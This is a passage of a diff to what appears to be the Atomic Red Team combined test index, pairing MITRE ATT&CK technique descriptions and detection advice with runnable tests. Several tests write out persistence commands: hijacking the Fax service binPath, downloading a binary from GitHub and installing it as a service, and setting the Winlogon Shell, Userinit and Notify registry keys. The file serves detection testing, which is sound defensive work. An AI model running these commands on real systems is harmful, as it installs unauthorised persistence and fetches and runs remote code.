services may be created during + installation of new software.\n\nSuspicious program execution through services + may show up as outlier processes that have not been seen before when compared + against historical data. Look for abnormal process call trees from known services + and for execution of other commands that could relate to Discovery or other + adversary techniques. Data and events should not be viewed in isolation, but + as part of a chain of behavior that could lead to other activities, such as + network connections made for Command and Control, learning details about the + environment through Discovery, and Lateral Movement." + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1543.003 + atomic_tests: + - name: Modify Fax service to run PowerShell + auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + description: | + This test will temporarily modify the service Fax by changing the binPath to PowerShell + and will then revert the binPath change, restoring Fax to its original state. + Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: | + sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" + sc start Fax + cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul + 2>&1 + - name: Service Installation CMD + auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + description: | + Download an executable from github and start it as a service. + Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_CMD + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: command_prompt + elevation_required: true + command: | + sc.exe create #{service_name} binPath= #{binary_path} + sc.exe start #{service_name} + cleanup_command: | + sc.exe stop #{service_name} >nul 2>&1 + sc.exe delete #{service_name} >nul 2>&1 + - name: Service Installation PowerShell + auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + description: | + Installs A Local Service via PowerShell. + Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_PowerShell + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: powershell + elevation_required: true + command: | + New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" + Start-Service -Name "#{service_name}" + cleanup_command: | + Stop-Service -Name "#{service_name}" 2>&1 | Out-Null + try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} + catch {} + T1547.004: + technique: + created: '2020-01-24T16:59:59.688Z' + modified: '2020-04-21T16:00:41.277Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 + description: "Adversaries may abuse features of Winlogon to execute DLLs and/or + executables when a user logs in. Winlogon.exe is a Windows component responsible + for actions at logon/logoff as well as the secure attention sequence (SAS) + triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable + to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish persistence." + name: Winlogon Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.004 + url: https://attack.mitre.org/techniques/T1547/004 + - external_id: CAPEC-579 + source_name: capec + url: https://capec.mitre.org/data/definitions/579.html + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + description: | + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Userinit Key Persistence - PowerShell + auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + description: | + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Notify Key Logon Persistence - PowerShell + auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + description: | + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + + Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force + cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + -Force -ErrorAction Ignore + +' + name: powershell + T1547.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.013 + url: https://attack.mitre.org/techniques/T1547/013 + - description: Free Desktop. (2006, February 13). Desktop Application Autostart + Specification. Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html + source_name: Free Desktop Application Autostart Feb 2006 + - description: Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. + Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html + source_name: Free Desktop Entry Keys + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: XDG Autostart Entries + description: |- + Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006) + + Within an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys) + + Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs. + id: attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T15:55:10.103Z' + created: '2019-09-10T18:13:12.195Z' + x_mitre_is_subtechnique: true + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_detection: "Malicious XDG autostart entries may be detected by auditing + file creation and modification events within the /etc/xdg/autostart + and ~/.config/autostart directories. Depending on individual + configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME + or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. + Autostart entry files not associated with legitimate packages may be considered + suspicious. Suspicious entries can also be identified by comparing entries + to a trusted system baseline.\n \nSuspicious processes or scripts spawned + in this manner will have a parent process of the desktop component implementing + the XDG specification and will execute as the logged on user." + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - root + x_mitre_platforms: + - Linux + atomic_tests: [] impact: T1531: technique: + created: '2019-10-09T18:48:31.906Z' + modified: '2020-07-14T19:15:29.911Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern + id: attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0 + description: |- + Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. + + Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) + name: Account Access Removal + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - url: https://attack.mitre.org/techniques/T1531 source_name: mitre-attack @@ -43272,22 +45860,22 @@ impact: url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ description: Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Account Access Removal - description: |- - Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. - - Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) - id: attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-07-14T19:15:29.911Z' - created: '2019-10-09T18:48:31.906Z' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'User Account: User Account Deletion' + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + x_mitre_permissions_required: + - User + - Administrator + - root + - SYSTEM + x_mitre_impact_type: + - Availability + x_mitre_version: '1.0' x_mitre_detection: |- Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account: @@ -43297,22 +45885,7 @@ impact: * Event ID 4740 - A user account was locked out Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. - x_mitre_version: '1.0' - x_mitre_impact_type: - - Availability - x_mitre_permissions_required: - - User - - Administrator - - root - - SYSTEM - x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: false identifier: T1531 atomic_tests: - name: Change User Password - Windows @@ -43440,9 +46013,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T02:01:10.832Z' + modified: '2021-03-29T16:08:52.118Z' created: '2020-02-20T15:35:00.025Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -43451,22 +46024,19 @@ impact: In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt. x_mitre_data_sources: - - Network device logs - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1499.004: technique: @@ -43492,9 +46062,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-29T02:07:27.508Z' + modified: '2021-03-29T16:09:41.559Z' created: '2020-02-20T15:37:27.052Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -43503,43 +46073,36 @@ impact: identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_data_sources: - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1485: technique: - id: attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c - description: |- - Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. - - Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) - - To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018) - name: Data Destruction - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2019-03-14T18:47:17.701Z' + modified: '2021-03-25T14:47:48.728Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1485 url: https://attack.mitre.org/techniques/T1485 - - source_name: Symantec Shamoon 2012 - url: https://www.symantec.com/connect/blogs/shamoon-attacks - description: Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March + - description: Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019. + url: https://www.symantec.com/connect/blogs/shamoon-attacks + source_name: Symantec Shamoon 2012 - url: https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html description: FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. @@ -43552,43 +46115,70 @@ impact: url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf description: 'Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.' - - source_name: Unit 42 Shamoon3 2018 - url: https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ - description: Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas + - description: Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019. + url: https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ + source_name: Unit 42 Shamoon3 2018 - source_name: Talos Olympic Destroyer 2018 url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-03-27T21:08:19.783Z' - created: '2019-03-14T18:47:17.701Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows + - source_name: Data Destruction - Threat Post + url: https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/ + description: Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code + Spaces Out of Business. Retrieved December 15, 2020. + - source_name: DOJ - Cisco Insider + url: https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network + description: DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging + Cisco’s Network. Retrieved December 15, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data Destruction + description: |- + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. + + Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) + + To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). + + In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) + id: attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c + x_mitre_impact_type: + - Availability + x_mitre_detection: |- + Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\Windows\System32\. + + In cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Deletion' + - 'Image: Image Deletion' + - 'Instance: Instance Deletion' + - 'Snapshot: Snapshot Deletion' + - 'Cloud Storage: Cloud Storage Deletion' + - 'Volume: Volume Deletion' + x_mitre_version: '1.1' x_mitre_permissions_required: - User - Administrator - root - SYSTEM - x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_detection: Use process monitoring to monitor the execution and command-line - parameters of binaries that could be involved in data destruction activity, - such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the - creation of suspicious files as well as high unusual file modification activity. - In particular, look for large quantities of file modifications in user directories - and under C:\Windows\System32\. - x_mitre_impact_type: - - Availability + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + - Syed Ummar Farooqh, McAfee + - Prasad Somasamudram, McAfee + - 'Sekhar Sarukkai, McAfee ' + - Varonis Threat Labs identifier: T1485 atomic_tests: - name: Windows - Overwrite file with Sysinternals SDelete @@ -43654,6 +46244,8 @@ impact: Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) + + In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) name: Data Encrypted for Impact created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -43678,12 +46270,18 @@ impact: url: https://www.us-cert.gov/ncas/alerts/AA18-337A description: 'US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.' + - source_name: Rhino S3 Ransomware Part 1 + url: https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ + description: 'Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved + April 14, 2021.' type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-10-14T14:52:11.708Z' + modified: '2021-04-20T16:39:06.594Z' created: '2019-03-15T13:59:30.390Z' + x_mitre_contributors: + - Oleg Kolesnikov, Securonix x_mitre_is_subtechnique: false x_mitre_impact_type: - Availability @@ -43691,21 +46289,26 @@ impact: Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories. In some cases, monitoring for unusual kernel driver installation activity can aid in detection. + + In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies. x_mitre_data_sources: - - Kernel drivers - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Cloud Storage: Cloud Storage Metadata' + - 'Cloud Storage: Cloud Storage Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' x_mitre_platforms: - Linux - macOS - Windows + - IaaS x_mitre_permissions_required: - User - Administrator - root - SYSTEM - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1486 atomic_tests: - name: Encrypt files using gpg (Linux) @@ -43903,7 +46506,7 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-03-28T23:16:20.202Z' + modified: '2021-04-24T14:04:16.371Z' created: '2020-03-02T14:19:22.609Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -43919,10 +46522,13 @@ impact: involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. x_mitre_data_sources: - - Packet capture - - Network protocol analysis - - File monitoring - - Application logs + - 'File: File Metadata' + - 'Process: OS API Execution' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -43949,17 +46555,15 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-04-22T15:19:31.682Z' + modified: '2021-03-08T10:33:01.150Z' created: '2019-04-08T17:51:41.390Z' x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure x_mitre_impact_type: - Integrity x_mitre_detection: "Monitor internal and external websites for unplanned content @@ -43968,10 +46572,10 @@ impact: artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n" x_mitre_data_sources: - - Packet capture - - Web application firewall logs - - Web logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1498.001: technique: @@ -44006,14 +46610,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:57:12.410Z' + modified: '2021-03-29T16:11:56.727Z' created: '2020-03-02T20:07:18.651Z' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring @@ -44026,20 +46627,19 @@ impact: time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability 